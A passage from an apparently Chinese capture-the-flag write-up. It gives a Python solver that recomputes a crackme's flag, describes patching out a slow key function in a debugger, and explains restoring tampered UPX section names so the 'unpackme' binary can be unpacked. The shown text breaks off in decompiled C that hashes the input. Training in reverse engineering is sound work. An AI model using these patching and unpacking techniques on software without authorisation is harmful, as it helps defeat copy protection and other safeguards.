class="mh">0x49</span><span class="p">,</span> <span class="mh">0xF1</span><span class="p">,</span> <span class="mh">0xA6</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0xDD</span><span class="p">,</span> <span class="mh">0x5F</span><span class="p">,</span> <span class="mh">0xC1</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0x35</span><span class="p">,</span> <span class="mh">0x2D</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0xC7</span><span class="p">,</span> <span class="mh">0x3F</span><span class="p">,</span> <span class="mh">0xB6</span><span class="p">,</span> <span class="mh">0xCD</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x1F</span><span class="p">,</span> <span class="mh">0xE0</span><span class="p">,</span> <span class="mh">0x6D</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x5E</span><span class="p">,</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0x8B</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0xCE</span><span class="p">,</span> <span class="mh">0xF7</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0xA8</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0xFA</span><span class="p">,</span> <span class="mh">0x8C</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0x60</span><span class="p">,</span> <span class="mh">0xFD</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x0E</span><span class="p">,</span> <span class="mh">0xFD</span><span class="p">,</span> <span class="mh">0xB3</span><span class="p">,</span> <span class="mh">0xAD</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0xB7</span><span class="p">,</span> <span class="mh">0x6C</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0x4F</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x5B</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0x0F</span><span class="p">,</span> <span class="mh">0xB4</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x84</span><span class="p">,</span> <span class="mh">0x99</span><span class="p">,</span> <span class="mh">0xA2</span><span class="p">,</span> <span class="mh">0x0E</span><span class="p">,</span> <span class="mh">0x8F</span><span class="p">,</span> <span class="mh">0xBE</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x01</span><span class="p">,</span> <span class="mh">0x9B</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0xBD</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x5F</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x9B</span><span class="p">,</span> <span class="mh">0xF4</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x8A</span><span class="p">,</span> <span class="mh">0xD6</span><span class="p">,</span> <span class="mh">0xBF</span><span class="p">,</span> <span class="mh">0xEF</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x86</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0xCD</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x03</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xDD</span><span class="p">,</span> <span class="mh">0x32</span><span class="p">,</span> <span class="mh">0xF4</span><span class="p">,</span> <span class="mh">0x56</span><span class="p">,</span> <span class="mh">0xC5</span><span class="p">,</span> <span class="mh">0xD5</span><span class="p">,</span> <span class="mh">0x4A</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x48</span><span class="p">,</span> <span class="mh">0xC5</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x18</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0xF3</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0xA8</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0xEF</span><span class="p">,</span> <span class="mh">0x6D</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0xAB</span><span class="p">,</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="mh">0x4A</span><span class="p">,</span> <span class="mh">0xCA</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xFC</span><span class="p">,</span> <span class="mh">0x5A</span><span class="p">,</span> <span class="mh">0x92</span><span class="p">,</span> <span class="mh">0xE0</span><span class="p">,</span> <span class="mh">0x78</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0xC6</span><span class="p">,</span> <span class="mh">0x4E</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0xEE</span><span class="p">,</span> <span class="mh">0x4E</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x05</span><span class="p">,</span> <span class="mh">0xB2</span><span class="p">,</span> <span class="mh">0xF7</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0xF3</span><span class="p">,</span> <span class="mh">0x99</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x23</span><span class="p">,</span> <span class="mh">0x8D</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0x9F</span><span class="p">,</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="mh">0x76</span><span class="p">,</span> <span class="mh">0xC0</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0xC6</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x0E</span><span class="p">,</span> <span class="mh">0x06</span><span class="p">,</span> <span class="mh">0x6A</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x71</span><span class="p">,</span> <span class="mh">0x1B</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x8B</span><span class="p">,</span> <span class="mh">0x91</span><span class="p">,</span> <span class="mh">0x33</span><span class="p">,</span> <span class="mh">0x4B</span><span class="p">,</span> <span class="mh">0x7C</span><span class="p">,</span> <span class="mh">0x46</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0x66</span><span class="p">,</span> <span class="mh">0x03</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0xED</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">,</span> <span class="mh">0xF7</span><span class="p">,</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0xB5</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0x3B</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0xEE</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0x02</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0x9A</span><span class="p">,</span> <span class="mh">0x05</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0xDC</span><span class="p">,</span> <span class="mh">0xC6</span><span class="p">,</span> <span class="mh">0x98</span><span class="p">,</span> <span class="mh">0xEA</span><span class="p">,</span> <span class="mh">0xCA</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0x70</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0xB4</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x3C</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0xB6</span><span class="p">,</span> <span class="mh">0x5F</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0xEA</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0x22</span><span class="p">,</span> <span class="mh">0xAD</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0x36</span><span class="p">,</span> <span class="mh">0x3B</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0xB7</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0xCD</span><span class="p">,</span> <span class="mh">0xD5</span><span class="p">,</span> <span class="mh">0x3B</span><span class="p">,</span> <span class="mh">0x79</span><span class="p">,</span> <span class="mh">0xC7</span><span class="p">,</span> <span class="mh">0x19</span><span class="p">,</span> <span class="mh">0x4B</span><span class="p">,</span> <span class="mh">0xF1</span><span class="p">,</span> <span class="mh">0xA9</span><span class="p">,</span> <span class="mh">0xB1</span><span class="p">,</span> <span class="mh">0xD5</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0x59</span><span class="p">,</span> <span class="mh">0x57</span><span class="p">,</span> <span class="mh">0xAD</span><span class="p">,</span> <span class="mh">0x5A</span><span class="p">,</span> <span class="mh">0xA8</span><span class="p">,</span> <span class="mh">0x28</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0x1E</span><span class="p">,</span> <span class="mh">0x92</span><span class="p">,</span> <span class="mh">0x6C</span><span class="p">,</span> <span class="mh">0x01</span><span class="p">,</span> <span class="mh">0x85</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0x51</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x81</span><span class="p">,</span> <span class="mh">0x65</span><span class="p">,</span> <span class="mh">0xEA</span><span class="p">,</span> <span class="mh">0x84</span><span class="p">,</span> <span class="mh">0x57</span><span class="p">,</span> <span class="mh">0x6F</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0xB6</span><span class="p">,</span> <span class="mh">0x0A</span><span class="p">,</span> <span class="mh">0x37</span><span class="p">,</span> <span class="mh">0xE0</span><span class="p">,</span> <span class="mh">0x1D</span><span class="p">,</span> <span class="mh">0x1E</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0x34</span><span class="p">,</span> <span class="mh">0xC7</span><span class="p">,</span> <span class="mh">0x7D</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0xD4</span><span class="p">,</span> <span class="mh">0x6A</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0xC2</span><span class="p">,</span> <span class="mh">0xA1</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0xF8</span><span class="p">,</span> <span class="mh">0x5A</span><span class="p">,</span> <span class="mh">0x9D</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0xC3</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x7F</span><span class="p">,</span> <span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0xE7</span><span class="p">,</span> <span class="mh">0xAB</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0x77</span><span class="p">,</span> <span class="mh">0xE2</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x11</span><span class="p">,</span> <span class="mh">0x0D</span><span class="p">,</span> <span class="mh">0xFB</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0x73</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0x18</span><span class="p">,</span> <span class="mh">0x2F</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xD5</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0xEC</span><span class="p">,</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x4B</span><span class="p">,</span> <span class="mh">0x83</span><span class="p">,</span> <span class="mh">0x1A</span><span class="p">,</span> <span class="mh">0xD6</span><span class="p">,</span> <span class="mh">0xF3</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">,</span> <span class="mh">0x9A</span><span class="p">,</span> <span class="mh">0x4B</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0xBB</span><span class="p">,</span> <span class="mh">0x2E</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0x6D</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0x0A</span><span class="p">,</span> <span class="mh">0xCE</span><span class="p">,</span> <span class="mh">0xC8</span><span class="p">,</span> <span class="mh">0xC4</span><span class="p">,</span> <span class="mh">0xFA</span><span class="p">,</span> <span class="mh">0x4A</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0xB4</span><span class="p">,</span> <span class="mh">0x6E</span><span class="p">,</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0xAC</span><span class="p">,</span> <span class="mh">0x58</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0xE1</span><span class="p">,</span> <span class="mh">0x62</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0x99</span><span class="p">,</span> <span class="mh">0xAB</span><span class="p">,</span> <span class="mh">0x92</span><span class="p">,</span> <span class="mh">0xAE</span><span class="p">,</span> <span class="mh">0xBD</span><span class="p">,</span> <span class="mh">0x84</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x7D</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">,</span> <span class="mh">0xFE</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0x6E</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">,</span> <span class="mh">0x04</span><span class="p">,</span> <span class="mh">0xA3</span><span class="p">,</span> <span class="mh">0xB1</span><span class="p">,</span> <span class="mh">0x72</span><span class="p">,</span> <span class="mh">0xCB</span><span class="p">,</span> <span class="mh">0x55</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0x91</span><span class="p">,</span> <span class="mh">0xF8</span><span class="p">,</span> <span class="mh">0x31</span><span class="p">,</span> <span class="mh">0x7E</span><span class="p">,</span> <span class="mh">0xA9</span><span class="p">,</span> <span class="mh">0x75</span><span class="p">,</span> <span class="mh">0x13</span><span class="p">,</span> <span class="mh">0xC0</span><span class="p">,</span> <span class="mh">0xF9</span><span class="p">,</span> <span class="mh">0xE2</span><span class="p">,</span> <span class="mh">0x22</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0x8F</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">,</span> <span class="mh">0x3A</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0x9E</span><span class="p">,</span> <span class="mh">0x5B</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0xDE</span><span class="p">,</span> <span class="mh">0xB8</span><span class="p">,</span> <span class="mh">0x94</span><span class="p">,</span> <span class="mh">0xA8</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0x34</span><span class="p">,</span> <span class="mh">0x25</span><span class="p">,</span> <span class="mh">0xF2</span><span class="p">,</span> <span class="mh">0xC6</span><span class="p">,</span> <span class="mh">0xC6</span><span class="p">,</span> <span class="mh">0x81</span><span class="p">,</span> <span class="mh">0xEE</span><span class="p">,</span> <span class="mh">0xC8</span><span class="p">,</span> <span class="mh">0x39</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">,</span> <span class="mh">0x2B</span><span class="p">,</span> <span class="mh">0x74</span><span class="p">,</span> <span class="mh">0xE5</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x2A</span><span class="p">,</span> <span class="mh">0xB9</span><span class="p">,</span> <span class="mh">0x21</span><span class="p">,</span> <span class="mh">0x92</span><span class="p">,</span> <span class="mh">0xE8</span><span class="p">,</span> <span class="mh">0x64</span><span class="p">,</span> <span class="mh">0x4E</span><span class="p">,</span> <span class="mh">0x24</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="mh">0xDA</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0xDB</span><span class="p">,</span> <span class="mh">0x67</span><span class="p">,</span> <span class="mh">0x63</span><span class="p">,</span> <span class="mh">0xA4</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x03</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0xD7</span><span class="p">,</span> <span class="mh">0x2C</span><span class="p">,</span> <span class="mh">0x87</span><span class="p">,</span> <span class="mh">0x95</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0x97</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x27</span><span class="p">,</span> <span class="mh">0xCC</span><span class="p">,</span> <span class="mh">0x3B</span><span class="p">,</span> <span class="mh">0xC7</span><span class="p">,</span> <span class="mh">0x6B</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x96</span><span class="p">,</span> <span class="mh">0x69</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x07</span><span class="p">,</span> <span class="mh">0x1C</span><span class="p">,</span> <span class="mh">0xD1</span><span class="p">,</span> <span class="mh">0x6A</span><span class="p">,</span> <span class="mh">0x8E</span><span class="p">,</span> <span class="mh">0x2A</span><span class="p">,</span> <span class="mh">0x61</span><span class="p">,</span> <span class="mh">0x26</span><span class="p">,</span> <span class="mh">0xA0</span><span class="p">]</span> <span class="n">a1</span> <span class="o">=</span> <span class="mi">4284256177</span> <span class="n">a2</span> <span class="o">=</span> <span class="mi">1234567890</span> <span class="n">a3</span> <span class="o">=</span> <span class="mi">1095061718431</span> <span class="n">v5</span> <span class="o">=</span> <span class="mi">4</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">n2s</span><span class="p">(</span><span class="mh">0x8B9551FA</span> <span class="o">*</span> <span class="n">a3</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">][:</span><span class="n">v5</span><span class="p">]</span> <span class="c1"># print flag</span> <span class="k">while</span> <span class="n">a2</span><span class="p">:</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">v5</span> <span class="n">v5</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">c</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">junk_data</span><span class="p">[</span><span class="n">a1</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">]</span> <span class="o">^</span> <span class="n">a2</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">%</span> <span class="mi">128</span><span class="p">)</span> <span class="c1"># flag += c if 0x20 &lt;= ord(c) &lt; 0x7f else &#34;&#34;</span> <span class="n">flag</span> <span class="o">+=</span> <span class="n">c</span> <span class="c1"># print ord(c)</span> <span class="n">a1</span> <span class="o">*=</span> <span class="mi">77777</span> <span class="n">a2</span> <span class="o">=</span> <span class="n">a3</span> <span class="o">^</span> <span class="p">(</span><span class="n">a2</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="n">a3</span> <span class="o">&gt;&gt;=</span> <span class="mi">1</span> <span class="n">flag</span> <span class="o">+=</span> <span class="n">c</span> <span class="k">print</span> <span class="n">flag</span> <span class="k">print</span> <span class="nb">len</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span> <span class="k">print</span> <span class="n">v5</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span> <span class="n">getInput</span><span class="p">()</span> <span class="c1"># [a2 = 1234567890, a1 = 2136772529]</span> <span class="c1"># [a2 = 1234567890, a1 = 4284256177]</span> <span class="n">key3</span> <span class="o">=</span> <span class="n">getKey3</span><span class="p">()</span> <span class="k">print</span> <span class="s2">&#34;key3 -&gt; </span><span class="si">%d</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">key3</span> <span class="n">getFlag</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>但奇怪的是用这个脚本没有跑出后几位flag,可能是python和C在边界处理上有区别</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5rdcvdqej30ad01pt8x.jpg" alt=""></p> <p>于是我换了一种方法,源程序中运算较慢是因为<strong>calc_key3</strong>这个函数耗费了大量的时间,把这个函数patch掉</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5rfemk8xj30mj07fq2v.jpg" alt=""></p> <p>然后在调试过程中手动给v7赋给我们计算出来的返回值,这样就可以得到flag了</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5ri5zprxj30mm0j449o.jpg" alt=""></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fm5rja85s1j30dt02z753.jpg" alt=""></p> <h3 id="0x0a-unpackme">0x0A unpackme</h3> <p>这道题目挺有意思, 需要对PE程序的结构有一些了解, 从题干已经可以知道这是一个加壳的程序,下载下来后 <code>upx -d</code> 脱壳失败,看来应该是壳的某些关键信息被改掉了,我们拿一个同样的 PE32(GUI) 程序加壳,比较一下文件结构,先用 <code>strings/rabin2 -zzqq</code> 比较两个binary的字符串,可以发现 <code>unpackme.exe</code> 中有很明显的人工修改过的字符串,如 <code>CTF0</code>, <code>CTF1</code>, <code>CTF2</code>, <code>CTF?</code>, <code>!The flag is not FLAG{Hello,DOS section}</code> 等. 放到 010editor 中使用 exe templete 分析,通过对比可以发现如假 FLAG 所说, section head被修改了,将 unpackme.exe 中的信息修改回来:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">CTF0 -&gt; UPX0 CTF1 -&gt; UPX1 CTF2 -&gt; .rsrc CTF? -&gt; UPX! !The flag is not FLAG{Hello,DOS section} -&gt; !This program cannot be run in DOS mode. </code></pre></td></tr></table> </div> </div><p>修改之后,就可以 upx -d 脱壳了,放入IDA中分析,可以看出关键代码如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="n">v4</span> <span class="o">=</span> <span class="n">GetParent</span><span class="p">(</span><span class="n">hWnd</span><span class="p">);</span> <span class="n">v5</span> <span class="o">=</span> <span class="n">GetDlgItemTextA</span><span class="p">(</span><span class="n">v4</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">String</span><span class="p">,</span> <span class="mi">63</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v5</span> <span class="p">)</span> <span class="p">{</span> <span class="n">phProv</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">phHash</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">CryptAcquireContextA</span><span class="p">(</span><span class="o">&amp;</span><span class="n">phProv</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1u</span><span class="p">,</span> <span class="mh">0xF0000000</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="n">CryptCreateHash</span><span class="p">(</span><span class="n">phProv</span><span class="p">,</span> <span class="mh">0x8003u</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">phHash</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="n">CryptHashData</span><span class="p">(</span><span class="n">phHash</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="n">BYTE</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">String</span><span class="p">,</span> <span class="n">v5</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="n">CryptGetHashParam</span><span class="p">(</span><span class="n">phHash</span><span class="p">,</span> <span class="mi">2u</span><span class="p">,</span> <span class="p">(</span><span class="n">BYTE</span> <span class="o">*</span><span class="p">)</span><span class="n">pbData</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pdwDataLen</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="n">ExitProcess</span><span class="p">(</span><span class="mi">1u</span><span class="p">);</span> <span class="p">}</span> <span class="n">CryptDestroyHash</span><span class="p">(</span><span class="n">phHash</span><span class="p">);</span> <span class="n">CryptReleaseContext</span><span 